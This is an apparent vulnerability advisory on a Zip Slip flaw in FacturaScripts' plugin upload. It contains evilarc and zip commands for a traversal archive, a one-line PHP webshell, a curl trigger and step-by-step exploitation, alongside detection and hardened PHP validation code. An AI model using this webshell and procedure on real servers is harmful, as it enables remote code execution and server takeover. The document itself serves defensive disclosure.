FacturaScripts, Zip Slip Vulnerability, CVE-2026-27891 (Critical)


How the mentioned CVE works:

The flaw resides in FacturaScripts’ Plugins::add() function within Plugins.php. The testZipFile function checks that the ZIP archive contains exactly one root folder by counting unique first path segments. However, it does not sanitize individual file paths for directory traversal sequences. An attacker creates a malicious ZIP where a file entry is named “ValidPluginName/../../shell.php”. The explode() function splits on ‘/’ and sees “ValidPluginName” as the first element, satisfying the single-root-folder validation.

During extraction, the system concatenates the destination plugins directory with the full entry name, including “../..”. This path traversal writes shell.php outside the plugins folder, e.g., into the web root. Because the extracted file is a .php script, an attacker can then request it via HTTP and achieve Remote Code Execution (RCE) with web server privileges. The vulnerability requires no authentication if the plugin upload feature is exposed to unprivileged users. The impacted function fails to call realpath() or validate the final absolute path before writing. Attackers can overwrite critical system files like config.php or index.php.

The provided PoC uses evilarc to generate the ZIP, injects a system() payload, uploads via “Add Plugin”, and triggers the shell via URL. This leads to full server compromise.

DailyCVE form:

Platform: FacturaScripts
Version: All versions
Vulnerability: Zip Slip RCE
Severity: Critical
Date: 07 May 2026

Prediction: Mid June 2026

What Undercode Say:

Create malicious ZIP using evilarc
python evilarc.py -o unix -p "MyPlugin/../../" -f evil.zip shell.php
Manual ZIP creation (Linux)
mkdir -p MyPlugin/../../
echo '<?php system($_GET["cmd"]); ?>' > MyPlugin/../../rce.php
zip -r evil.zip MyPlugin/
Verify traversal
unzip -l evil.zip
Exploit trigger
curl "https://target.com/rce.php?cmd=id"
Detection command (search for PHP files newer than the plugins directory; the original pattern ".php" only matched a file literally named ".php")
find /var/www/html -name "*.php" -newer /var/www/html/plugins -type f

Exploit:

  1. Craft ZIP with entry: “PluginName/../../rce.php” containing PHP webshell.
  2. Navigate to FacturaScripts admin panel → Add Plugin.
  3. Upload malicious ZIP (validation passes due to single root folder name).
  4. System extracts file to web root due to path traversal.
  5. Access https://target.com/rce.php?cmd=whoami to execute commands.

Protection from this CVE:

  • Update to patched version once available (monitor FacturaScripts GitHub).
  • Apply input validation: reject any ZIP entry containing “..” or absolute paths.
  • Use `realpath()` after resolving destination and ensure it stays inside plugins directory.
  • Run web server with least privilege (www-data cannot write to sensitive dirs).
  • Disable plugin upload functionality if not required.
  • Use a Web Application Firewall (WAF) to block path traversal strings in uploaded filenames.
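The second and third protection points above (reject “..” and absolute paths, then confirm the resolved destination stays inside the plugins directory) are shown below as an added example. This is not FacturaScripts’ own code or its patch: the function names `safeEntryName` and `validatePluginZip`, the `$zipPath`/`$pluginsDir` parameters and the sample paths are assumptions, and it needs PHP 8 for `str_contains`. It keeps the original single-root-folder rule but adds the per-entry traversal check that the vulnerable `testZipFile` lacked, and it refuses the whole archive before anything is extracted.

```php
<?php
// Added example (not FacturaScripts' own code): hardened validation of a plugin
// ZIP that rejects path traversal before extraction. Assumes the uploaded
// archive path is $zipPath and plugins live under $pluginsDir (both constructed).
declare(strict_types=1);

/**
 * Normalise a ZIP entry name without touching the filesystem.
 * Returns null when the entry is absolute, contains "..", a backslash or NUL.
 */
function safeEntryName(string $entry): ?string
{
    // Backslashes and NUL bytes are never legitimate in a plugin archive.
    if (str_contains($entry, '\\') || str_contains($entry, "\0")) {
        return null;
    }
    // Absolute paths (/etc/..., C:/...) must be rejected outright.
    if ($entry === '' || $entry[0] === '/' || preg_match('#^[A-Za-z]:#', $entry)) {
        return null;
    }
    $parts = [];
    foreach (explode('/', $entry) as $segment) {
        if ($segment === '' || $segment === '.') {
            continue;           // skip empty and "." segments
        }
        if ($segment === '..') {
            return null;        // any traversal segment fails the entry
        }
        $parts[] = $segment;
    }
    return $parts === [] ? null : implode('/', $parts);
}

/**
 * Validate every entry of a plugin ZIP: no traversal AND exactly one root folder.
 * Returns the root folder name on success, throws on any violation.
 */
function validatePluginZip(string $zipPath, string $pluginsDir): string
{
    $pluginsReal = realpath($pluginsDir);
    if ($pluginsReal === false) {
        throw new RuntimeException("plugins directory does not exist: $pluginsDir");
    }
    $zip = new ZipArchive();
    if ($zip->open($zipPath) !== true) {
        throw new RuntimeException("cannot open archive: $zipPath");
    }
    $roots = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $raw   = $zip->getNameIndex($i);
        $clean = safeEntryName($raw);
        if ($clean === null) {
            $zip->close();
            throw new RuntimeException("rejected unsafe entry: $raw");
        }
        // Containment check on the final destination: it must start with the
        // resolved plugins directory plus a separator. This is the check the
        // vulnerable code never performed after concatenating the entry name.
        $prefix = $pluginsReal . DIRECTORY_SEPARATOR;
        $target = $prefix . $clean;
        if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
            $zip->close();
            throw new RuntimeException("entry escapes plugins dir: $raw");
        }
        $roots[explode('/', $clean)[0]] = true;
    }
    $zip->close();
    if (count($roots) !== 1) {
        throw new RuntimeException('archive must contain exactly one root folder');
    }
    return array_key_first($roots);
}

// Usage with constructed paths: validate first, extract only if it passes.
// An entry such as "MyPlugin/../../rce.php" throws "rejected unsafe entry".
try {
    $root = validatePluginZip('/tmp/upload.zip', '/var/www/html/Plugins');
    echo "archive accepted, root folder: $root\n";
} catch (RuntimeException $e) {
    error_log('plugin upload rejected: ' . $e->getMessage());
}
```

Logging the rejected entry name (as in the `catch` block) gives a detection signal as well: a burst of “rejected unsafe entry” messages against the plugin upload endpoint is worth alerting on.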

Impact:

  • Full server compromise: read database credentials, modify source code, delete files.
  • Remote Code Execution leads to complete loss of confidentiality, integrity, and availability.
  • Attacker can pivot to internal network or deploy ransomware.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
